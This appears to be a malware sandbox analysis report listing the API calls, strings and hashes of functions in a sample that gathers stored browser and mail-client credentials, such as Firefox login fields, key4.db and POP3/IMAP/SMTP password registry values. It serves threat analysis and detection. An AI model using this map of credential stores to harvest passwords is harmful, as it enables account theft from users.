                                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                                      • API String ID: 2814039832-2206097438
                                                                                                                                                                                                                                      • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                      • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,7693E430,?,00000000), ref: 00402533
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,7693E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7693E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                      • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                                      • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                                      • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                      • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
